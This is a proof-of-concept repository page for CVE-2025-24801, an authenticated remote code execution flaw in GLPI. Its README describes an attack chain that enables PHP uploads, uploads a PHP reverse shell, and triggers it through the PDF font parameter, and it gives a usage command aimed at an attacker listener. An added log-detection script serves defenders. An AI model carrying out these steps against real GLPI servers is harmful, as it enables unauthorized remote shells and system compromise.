CVE-2025-24801 PoC — GLPI allows authenticated remote code execution

Associated Vulnerability
Title: GLPI allows authenticated remote code execution (CVE-2025-24801)
Description: GLPI is a free asset and IT management software package. An authenticated user can upload and force the execution of *.php files located on the GLPI server. This vulnerability is fixed in 10.0.18.
Description
CVE-2025-24801 Exploit 
Readme
# CVE-2025-24801 PoC for GLPI RCE

This repository contains a proof-of-concept script (`poc.py`) that exploits CVE-2025-24801, an LFI-to-RCE vulnerability in GLPI 10.0.17. It automates:

* Logging into GLPI
* Enabling `.php` uploads by updating document type settings
* Uploading a PHP reverse shell via the AJAX file upload endpoint

## 🛠️ Installation

```bash
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
```

## 🚀 Usage

```bash
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
```

* `--url`: Base URL of the GLPI instance (e.g. `https://example.com/glpi`)
* `--user` / `--password`: Valid GLPI technician credentials
* `--lhost` / `--lport`: Attacker IP and port for the reverse shell listener

By default the script uses `--doc-id 1`, which updates the first document type.

After execution, the script will:

1. Log in and establish a session
2. Enable `.php` uploads by updating document type ID 1
3. Upload `exploit.php` containing a PHP reverse shell payload

You will then need to manually trigger the LFI by specifying the uploaded filename in the PDF font include (e.g., via the report export feature) to achieve RCE.

## 📑 How It Works

1. **Login**: Extracts the CSRF token from `/front/login.php` and posts credentials to authenticate.
2. **Enable PHP Uploads**: Fetches `/front/documenttype.form.php?id=1`, parses the CSRF token, and adds `php` to the allowed extensions.
3. **Upload Shell**: Fetches `/front/ticket.form.php` for a CSRF token, then uses `/ajax/fileupload.php` (with `X-Requested-With: XMLHttpRequest`) to upload a PHP reverse shell.
4. **Trigger RCE**: Manually invoke the PDF font LFI by specifying the uploaded shell filename in the `pdffont` parameter during report export.
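
For defenders, steps 2 and 3 leave a recognizable pair of requests in web server access logs. The following is an added example, not part of the repository: it flags a client that POSTs to the document type form and then to the file upload endpoint within a time window, and compares a plain numeric version string against the fixed release 10.0.18. The Combined Log Format, the 30-minute window and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Endpoints named in "How It Works" steps 2 and 3.
DOCTYPE_EDIT = "/front/documenttype.form.php"
FILE_UPLOAD = "/ajax/fileupload.php"
FIXED_VERSION = (10, 0, 18)  # fixed release stated in the vulnerability description

# Combined Log Format; the log layout is an assumption about the web server.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_patched(version: str) -> bool:
    """True when a numeric GLPI version string is at or above the fixed release."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts >= FIXED_VERSION

def find_suspicious_sequences(lines, window=timedelta(minutes=30)):
    """Return (ip, edit_time, upload_time) for each upload that follows a
    document type edit from the same client within `window`."""
    last_edit = {}  # client ip -> time of most recent document type POST
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        # Only successful or redirected POSTs are of interest here.
        if not m or m["method"] != "POST" or m["status"][0] not in "23":
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]  # drop any query string
        if path.endswith(DOCTYPE_EDIT):
            last_edit[m["ip"]] = ts
        elif path.endswith(FILE_UPLOAD):
            edit = last_edit.get(m["ip"])
            if edit is not None and timedelta(0) <= ts - edit <= window:
                hits.append((m["ip"], edit, ts))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Mar/2025:10:00:01 +0000] "POST /glpi/front/login.php HTTP/1.1" 302 0',
    '198.51.100.7 - - [03/Mar/2025:10:00:05 +0000] "POST /glpi/front/documenttype.form.php HTTP/1.1" 302 0',
    '203.0.113.9 - - [03/Mar/2025:10:00:09 +0000] "POST /glpi/ajax/fileupload.php HTTP/1.1" 200 412',
    '198.51.100.7 - - [03/Mar/2025:10:00:12 +0000] "POST /glpi/ajax/fileupload.php HTTP/1.1" 200 398',
]

if __name__ == "__main__":
    for ip, edit, upload in find_suspicious_sequences(SAMPLE_LOG):
        print(f"{ip}: doctype edit {edit:%H:%M:%S} -> upload {upload:%H:%M:%S}")
```

Document type edits are rare administrative actions, so a hit warrants checking whether the allowed extensions for that document type now include `php` and whether the instance is below 10.0.18.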

## ⚠️ Disclaimer

This tool is intended for authorized security testing and educational purposes only. Do not use it against systems without explicit permission.

---

*Created for educational and authorized pentesting purposes.*
File Snapshot

```
[4.0K] /data/pocs/94d2be6aee5264a2b6228640fdbc2ce8845e3718
├── [2.8K] exploit.py
├── [2.1K] README.md
└── [ 40] requirements.txt

0 directories, 3 files
```